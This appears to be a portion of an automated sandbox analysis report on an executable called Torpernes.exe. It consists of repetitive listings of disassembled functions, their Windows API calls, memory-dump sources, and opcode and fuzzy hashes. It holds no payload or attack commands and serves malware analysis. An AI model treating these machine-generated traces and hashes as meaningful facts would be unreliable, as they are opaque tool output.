                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$AttributesCreate
                                            • String ID:
                                            • API String ID: 415043291-0
                                            • Opcode ID: 4aea1d938fffc26f88db0c1450a16801fb26c1c2da6c6aae83084e0ba0c8a9b4
                                            • Instruction ID: 6e3fe12f06474a07815b5ea3b085539d8110fe4fc4e7b987d4d26a3482594277
                                            • Opcode Fuzzy Hash: 4aea1d938fffc26f88db0c1450a16801fb26c1c2da6c6aae83084e0ba0c8a9b4
                                            • Instruction Fuzzy Hash: 75D09E71658201EFEF098F20DE16F6EBBA2EB84B00F10962DB652940E0D6715815DB16
                                            Function 00405A60 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,00405665,?,?,00000000,0040583B,?,?,?,?), ref: 00405A65
                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405A79
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                            • Instruction ID: 9780a6166483d137596f56ab5e78d089f260a57706e709d7012a5a6f11cb0da1
                                            • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                            • Instruction Fuzzy Hash: 00D0C972A08020AFC2102728AE0889BBB55DB542717018B31F965A22B0C7304D528AA6
                                            Function 00401718 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: PathSearch
                                            • String ID:
                                            • API String ID: 2203818243-0
                                            • Opcode ID: 53f06e33fc5a1b6afd96b087539991c9c55cf30346cc6d73318182ea42a885f0
                                            • Instruction ID: 8c03d1068267bf34afbfcea84989045030d97b57746e23387a503ae4f4345c3c
                                            • Opcode Fuzzy Hash: 53f06e33fc5a1b6afd96b087539991c9c55cf30346cc6d73318182ea42a885f0
                                            • Instruction Fuzzy Hash: CAE04FB2314240AAD710DFA5DE48EEA77ACDB0036CF30467AE611A61D0E2B49A41972D
                                            Function 00402C44 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 44e0b576e29637486a21b5fbc1b0d2d218e8efd629f17f2245637563e5c98229
                                            • Instruction ID: f65b515b25232abf96548b9ad494cf34643fcd1092d5b4409f3cd7ecb0c7e4b5
                                            • Opcode Fuzzy Hash: 44e0b576e29637486a21b5fbc1b0d2d218e8efd629f17f2245637563e5c98229
                                            • Instruction Fuzzy Hash: 53E08676240108BFDB00DFA4DD47FD577ECEB14704F008421B609E70A1C774E54087A8
                                            Function 00405B08 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405B1C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                            • Instruction ID: 4c61608b6bc4516409ad0b91e34087b92b67e4ba4ba38001e86525b3dc608f87
                                            • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                            • Instruction Fuzzy Hash: 41E0B63265425EABDF50AEA59C04AAB7B6CEB05360F004832F915F6290D231F8219AA5
                                            Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 32e1619a51f7570a6a3b8ffd60e038cbbdd898c186c873270c24c414923770af
                                            • Instruction ID: 4fddb98f6eff75a2f38ef4fd4ce8fbcf91927641295d3064ec740d6a2bf28992
                                            • Opcode Fuzzy Hash: 32e1619a51f7570a6a3b8ffd60e038cbbdd898c186c873270c24c414923770af
                                            • Instruction Fuzzy Hash: 9BD012B2B18100D7CB10DFE59A08ADDB7659B10329F304A77D101F21D0D2B885419A2A
                                            Function 00404073 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404085
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: a3ec561b716cca9a07e24a276e245c065f41e56763f8222d9f4b5d0f47373cb7
                                            • Instruction ID: bb0ad24e73e2958be9e95b9dd025169b3dbcb7ce43939e5af5ed9013983f2583
                                            • Opcode Fuzzy Hash: a3ec561b716cca9a07e24a276e245c065f41e56763f8222d9f4b5d0f47373cb7
                                            • Instruction Fuzzy Hash: 12C09B717443007BDA308B509D45F1777686754710F14483D7744F50D4C674F421D61D
                                            Function 0040405C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000028,?,00000001,00403E88), ref: 0040406A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 7569b990d3993be5e38fae2738398c0a747316f8fb90ffebe6f1ef05658bce18
                                            • Instruction ID: e4336e2cfbd41e748b944d74dd02d4a8bd9ce4dfb2de751b616b6052b3cbf02c
                                            • Opcode Fuzzy Hash: 7569b990d3993be5e38fae2738398c0a747316f8fb90ffebe6f1ef05658bce18
                                            • Instruction Fuzzy Hash: 4BB09235684201BAEA214B00ED49F957A62AB68701F008464B300240B0C6B244A2DB1A
                                            Function 004031B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F30,?,?,?,?,00000000,00403455,?), ref: 004031C2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                            • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                            • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                            • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                            Function 00404049 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403E21), ref: 00404053
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 4bb622bccf1f08ea545092c2085972f35b100486218bda082c58954abe8874f9
                                            • Instruction ID: c0ab7025b6f4db9671e0cb98d43949d97d44530e98ecb7646c4581f8057f458a
                                            • Opcode Fuzzy Hash: 4bb622bccf1f08ea545092c2085972f35b100486218bda082c58954abe8874f9
                                            • Instruction Fuzzy Hash: FCA001B6949100BFCB129B90EF48D0ABB62BBA4751B518A79B2459003486725871EB5A

                                            Non-executed Functions

                                            Function 00404A3D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404A55
                                            • GetDlgItem.USER32(?,00000408), ref: 00404A60
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AAA
                                            • LoadBitmapW.USER32(0000006E), ref: 00404ABD
                                            • SetWindowLongW.USER32(?,000000FC,00405035), ref: 00404AD6
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AEA
                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AFC
                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404B12
                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404B1E
                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404B30
                                            • DeleteObject.GDI32(00000000), ref: 00404B33
                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404B5E
                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404B6A
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C00
                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404C2B
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404C3F
                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404C6E
                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404C7C
                                            • ShowWindow.USER32(?,00000005), ref: 00404C8D
                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404D8A
                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404DEF
                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404E04
                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404E28
                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404E48
                                            • ImageList_Destroy.COMCTL32(?), ref: 00404E5D
                                            • GlobalFree.KERNEL32(?), ref: 00404E6D
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404EE6
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404F8F
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F9E
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FBE
                                            • ShowWindow.USER32(?,00000000), ref: 0040500C
                                            • GetDlgItem.USER32(?,000003FE), ref: 00405017
                                            • ShowWindow.USER32(00000000), ref: 0040501E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: b390996d46cd98e283d69fcdb72103580f7ea8abd4757dd5e45084b4b85de18d
                                            • Instruction ID: 984333f753bf963cf7c1d03b693c7aaf3de5c02cdfbc3fe81bdc063d441272a2
                                            • Opcode Fuzzy Hash: b390996d46cd98e283d69fcdb72103580f7ea8abd4757dd5e45084b4b85de18d
                                            • Instruction Fuzzy Hash: C10282B0A00209EFEB209F55DD85AAE7BB5FB84314F50813AF610B62E1C7799D52CF58
                                            Function 004044C2 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 00404511
                                            • SetWindowTextW.USER32(00000000,?), ref: 0040453B
                                            • SHBrowseForFolderW.SHELL32(?), ref: 004045EC
                                            • CoTaskMemFree.OLE32(00000000), ref: 004045F7
                                            • lstrcmpiW.KERNEL32(Execute: ,004226B0,00000000,?,?), ref: 00404629
                                            • lstrcatW.KERNEL32(?,Execute: ), ref: 00404635
                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404647
                                              • Part of subcall function 004055D9: GetDlgItemTextW.USER32(?,?,00000400,0040467E), ref: 004055EC
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406110
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,?,?,00000000), ref: 0040611F
                                              • Part of subcall function 004060AD: CharNextW.USER32(?,"C:\Users\user\Desktop\Torpernes.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406124
                                              • Part of subcall function 004060AD: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031D7,C:\Users\user\AppData\Local\Temp\,74DF3420,004033E7), ref: 00406137
                                            • GetDiskFreeSpaceW.KERNEL32(00420680,?,?,0000040F,?,00420680,00420680,?,00000000,00420680,?,?,000003FB,?), ref: 00404709
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404724
                                              • Part of subcall function 0040487D: lstrlenW.KERNEL32(004226B0,004226B0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 0040491E
                                              • Part of subcall function 0040487D: wsprintfW.USER32 ref: 00404927
                                              • Part of subcall function 0040487D: SetDlgItemTextW.USER32(?,004226B0), ref: 0040493A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
